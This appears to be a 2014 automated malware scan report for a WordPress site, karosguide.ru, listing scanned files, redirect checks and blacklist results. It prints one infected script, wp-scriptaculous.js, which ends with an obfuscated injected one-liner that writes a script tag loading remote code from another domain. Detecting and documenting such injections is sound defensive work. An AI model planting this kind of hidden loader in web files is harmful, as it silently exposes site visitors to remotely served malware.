Scanned pages/files
Request | Server response | Status |
http://karosguide.ru/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 01 Jul 2014 02:37:12 GMT Location: http://www.karosguide.ru/ Server: nginx Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.karosguide.ru/xmlrpc.php X-Powered-By: PHP/5.3.3-7+squeeze8 | clean |
http://www.karosguide.ru/ | 200 OK Content-Length: 11447 Content-Type: text/html | clean |
http://www.karosguide.ru/wp-includes/js/prototype.js?ver=1.6.1 | 200 OK Content-Length: 139854 Content-Type: application/x-javascript | clean |
http://www.karosguide.ru/wp-includes/js/scriptaculous/wp-scriptaculous.js?ver=1.8.3 | 200 OK Content-Length: 3156 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
var Scriptaculous = {
  Version: '1.8.3',
  require: function(libraryName) {
    try{
      document.write('<script type="text/javascript" src="'+libraryName+'"><\/script>');
    } catch(e) {
      var script = document.createElement('script');
      script.type = 'text/javascript';
      script.src = libraryName;
      document.getElementsByTagName('head')[0].appendChild(script);
    }
  },
  REQUIRED_PROTOTYPE: '1.6.0.3',<
      includes = s.src.match(/\?.*load=([a-z,]*)/);
      if ( includes ) {
        includes[1].split(',').each( function(include) { Scriptaculous.require(path+include+'.js') });
      }
    });
  }
};
Scriptaculous.load();
<!-- js-tools -->
f=0;while(f<102)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00pcpsvepwbojf.gvkjfmfdusjd/sv0xq.dpoufou0qmvhjot0dpoubdu.gpsn.80tubu/qiq#?=0tdsjqu?'.charCodeAt(f++)-1))
<!-- /js-tools -->
Antivirus reports:
http://www.karosguide.ru/wp-includes/js/scriptaculous/effects.js?ver=1.8.3 | 200 OK Content-Length: 38471 Content-Type: application/x-javascript | clean |
http://www.karosguide.ru/wp-content/plugins/lightbox-2/lightbox.js?ver=1.8 | 200 OK Content-Length: 21338 Content-Type: application/x-javascript | clean |
http://counter.rambler.ru/top100.jcn?2474449 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
http://karosguide.ru/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Tue, 01 Jul 2014 02:37:14 GMT Pragma: no-cache Location: http://www.karosguide.ru/test404page.js Server: nginx Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Tue, 01 Jul 2014 02:37:14 GMT X-Pingback: http://www.karosguide.ru/xmlrpc.php X-Powered-By: PHP/5.3.3-7+squeeze8 | clean |
http://www.karosguide.ru/test404page.js | 404 Not Found Content-Length: 15941 Content-Type: text/html | clean |
http://www.karosguide.ru/wp-login.php | 200 OK Content-Length: 2416 Content-Type: text/html | clean |
http://www.karosguide.ru/wp-login.php?action=lostpassword | 200 OK Content-Length: 2161 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: karosguide.ru
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 01 Jul 2014 02:37:12 GMT
Location: http://www.karosguide.ru/
Server: nginx
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.karosguide.ru/xmlrpc.php
X-Powered-By: PHP/5.3.3-7+squeeze8
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: karosguide.ru
Referer: http://www.google.com/search?q=karosguide.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=karosguide.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://karosguide.ru/
Result: karosguide.ru is not infected or malware details are not published yet.